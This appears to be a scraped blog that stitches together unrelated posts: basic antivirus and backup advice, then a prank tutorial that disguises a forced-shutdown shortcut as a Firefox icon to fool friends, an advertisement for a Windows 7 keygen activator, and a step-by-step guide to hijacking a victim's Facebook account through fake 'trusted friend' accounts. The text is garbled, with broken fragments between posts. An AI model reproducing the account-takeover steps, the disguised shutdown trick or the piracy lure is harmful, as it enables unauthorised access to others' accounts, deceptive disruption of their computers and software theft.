9.           Data Backup: If you have critical data, work-related documents, or personal files, then you must back them up as often as possible, because you never know what will happen to your computer. From viruses to system crashes, these sensitive bits of information can be wiped clean from your hard drive in the blink of an eye, so it's best to always have a backup at hand.
10.      Password Policies: The passwords you pick could mean the difference between a breached computer and a safe computer. At any rate, the most common recommendations when it comes to picking a password includes not using the same password on every one of your accounts, using combinations of letters and numbers, and making sure that your password is as arcane as possible without necessarily making it too difficult for you to remember it.
Never give out your password to anyone.

How To Protect Your Computer From Virus

07:53 ---

What can I do to protect myself from computer viruses and Trojans?

These days, practically everyone's online, downloading and exchanging files, and developers are in such a hurry to get their Web sites up or their files out that checking for a nasty bug is more of a courtesy than a requirement. If you're not careful, your computer can end up with a nasty virus that makes your files act oddly, crashes your computer, pops up bizarre messages, or worst of all, destroys your operating system.A computer virus is the most subtle of computer problems. It usually loads itself into your computer system when you run a program to which it has attached itself. From the computer system, it'll then reproduce itself, much like a biological virus would, by attaching copies of itself to other programs on your hard drive. What it does then depends on the malevolence of its creator. Some viruses are nothing more than a practical joke. They may bring up a message like "Merry Xmas" or melt your display. Most of them though, either start destroying your system or your files immediately or on a date specified by their creators—like the much-publicized Michelangelo virus, which erases important pieces of your system on March 6. "Trojan horse" programs are similar to viruses in their effect on your system, but they can't reproduce themselves. They're usually a program disguised as something you might want to download onto your computer—for instance, a rogue, modified version of PKWare's PKZIP utility. But when you run the new program you just found, it can do anything from popping up a message to erasing your hard disk, as the rogue PKZIP utility really did.In either case, you have to actually launch the infected program or the trojan horse for it to infiltrate your system. Though hoax e-mails, like the one about the "Good Times" virus try to make you believe otherwise, neither a virus nor a trojan horse program can do anything if you simply leave the malevolent file sitting on your hard drive.Finding out that you copied a trojan horse onto your computer is remarkably easy. You launch the program, and the next thing you know, something completely unexpected happens—maybe your system is gone or your computer is laughing maniacally at you. But unless you notice your computer acting oddly before the virus has done its worst damage, you may very well not know you have it until it's too late.
Protect YourselfThere are a few basic rules that computer users should follow to short-circuit viruses. The best known bit of advice is this: Never open any attachment unless you know who it's from and why they are sending it. Refusing to open unsolicited e-mail of any kind is the only sure-fire way to sidestep all forms of trouble.Anti-virus software is crucial to preventing virus attacks, but this strategy only works if users update their software.Unfortunately, 'keeping it current' means updating it weekly, at least but most products today allow one to automate this process, but file downloads can be large and slow.Factors to consider when buying an anti-virus package include cost, quality of tech support, how frequently the package self-updates and the platforms supported by the program.Common sense is another good weapon in the fight against viruses. Be wary of opening any email attachments, even from your firends , especially if it has been forwarded to them.Set up your anti-virus product so that it automatically scans incoming e-mail and avoiding e-mail software that allows automatic launching of attachments.If all of this sounds like a lot of work, it is. There is always a tradeoff between ease of use and security but the extra time you spend updating your anti-virus software now will save you hours of time and buckets of frustration later.If you don't keep it updated, you might was well be completely unprotected.PreventionLike sexually transmitted diseases (STDs), computer viruses existed prior to the popularity of the Internet, but as with the sexual revolution of the '70s, viruses have flourished with the widespread sharing of information. And, much like the efforts to control STDs, controlling computer viruses is to be done through education and practicing safe hex (a play on words which means to perform certain measures to protect your computer).1. Be sure do a full back up of your system on a regular basis. The best way to clean up an infected file is to replace it with an original non-infected file. Not to mention the grief a current back up will save if a virus takes your system completely down. It's also a good idea to keep more than one set of backup in case the current one is infected before the virus is detected.2. Always use an anti-virus software program, one with both an on-demand and an on-access scanner. You'll want to look for one that has a fairly complete database of viruses and that is updateable. New viruses are produced daily, so it's important to have software that can detect the latest threat.Be sure to read the manual and follow the directions of the software program to ensure it's protecting you properly. Also, consider buying and using two different brands to be doubly protected. See our review of anti-virus programs.3. Update the virus database in your anti-virus program regularly (each month or by the direction of the manufacturer).4. On a PC, change the CMOS setting of your boot up process from booting first on the A drive (floppy) and then on the C drive (hard drive) to just booting on the C drive. This will not only speed up your boot up process but also completely eliminate the risk of infecting your hard drive with an infected floppy disk.If you should need to boot from a floppy you can easily change the settings back and reboot from the A drive. Please note: an infected non-bootable floppy disk can just as easily infect your hard drive as would an infected bootable one.5. Don't allow your web browser to automatically run programs, such as MS Word or other programs through its e-mail program. Configure your browser to launch WordPad or Notepad instead. One of the biggest and growing threats is the macro virus, which is spread through data processing and spread sheet programs6. Configure your web browsers to disable ActiveX, Java, and Javascript. You'll lose some of the fun the Web's been known for, but you'll save your computer from contracting a virus and speed up your connection.7. Know that the only way a virus spreads is either by launching an infected file or by booting an infected disk. You can not get a virus by simply being online or by reading e-mail. You have to download and launch an infected file before it will spread. Therefore, do not launch any unsolicited executable files sent via e-mail.8. Using an updated anti-virus program, scan all new software for viruses before installing them on your hard drive. Even shrink-wrapped software from major publishers has been known to contain viruses.9. Be aware of hoaxes. To increase mass hysteria, there have been many stories conjured up and spread by unknowledgeable users. For a list of known hoaxes check out the following site:http://www.symantec.com/business/security_response/threatexplorer/risks/hoaxes.jspViruses are not the only type of programs that are written solely to cripple computer systems or to use a computer in an unauthorized way. Other malicious programs are Logic Bombs, Trojan Horses, and Worms.

Shutdown Virus

07:30 ---


How To Make a Shutdown Virus

1. How To Make A Shutdown Virus   In this presentation you will learn how to make a virus joke to your friends and shut down their computer. Replace one of their used icons on the desktop with a fake one . And when they try to open it, their computer will close.2.  … first step… Right click on the desktop and go to New -> Create Shortcut .3.  … second step… Type in the windows that appears: shutdown -s -t 60 -c "Virus Detection. Computer is shutting down." Instead of 60 you can put what value you want. It represents the time in seconds . And also between quotes you can put what message you desire.4.  … third step… Click Next and type firefox . You can write whatever you want.5.  … fourth step… We need to change its icon to look like Mozilla Firefox.6. The 'virus' will look Mozilla Firefox.7. Thanks for your attention and… … Shutdown more computer you can!!!! The only way is…




06:52 ---
Hai Iam Sabareesh

Windows 7 Keygen And Activator v2.42 Free Download

06:33 ---
Windows 7 Keygen And Activator v2.42 Free Download

Windows 7 Keygen And Activator

Got a  copy of Windows 7 but cant get access to the updates? Cant make your copy a genuine version?
By using our custom coded activator you can make any copy of Windows 7 genuine and then have full access to all updates, service packs andall Windows 7 products

INSTRUCTIONS:

1. Downlaod the activator and run the program
2. Wait for around 2 to 3 minutes for activation
3. Once activated rebbot PC and double check.
3. Now you can use Windows Update and update PC

How to Hack Facebook Password With Out Software

06:13 ---

Concept Behind The Hack

As explained earlier Facebook allows three trusted friend to retrieve passwords but what if we are the three trusted friends ? So the idea here is create three fake accounts and become victims friends after which we simply fallow the steps to retrieve Facebook  password


Demonstration


1. First create three fake Facebook accounts , then become friends with your victim

2. Now go to Facebook.com and click on forgot your password as shown


3. Now enter all the info that you know about the victim  such as name ,email id as shown  finally click on search



4. Now Facebook will show some information about how many emails are linked to the account, click on i no longer have access to these as shown



5. Now it will prompt you to enter a new email address on which you will get the password resetting option,  I suggest you create a Fake or Temporary email address for safety purposes


6. Now face book will prompt you to answer some  security questions  if you have some guesses that’s ok but if you don’t know it than simply enter 3 wrong answers and it will take you to the 3 trusted friends recovery page as shown



7. Now just click continue and facebook will ask you to choose trusted friends choose the 3 fake accounts that you created earlier and added into the victims account.


8. After selecting 3 accounts facebook will send security codes to these accounts just enter these codes and you will get Password Resetting email from Facebook on the account you created in Step 5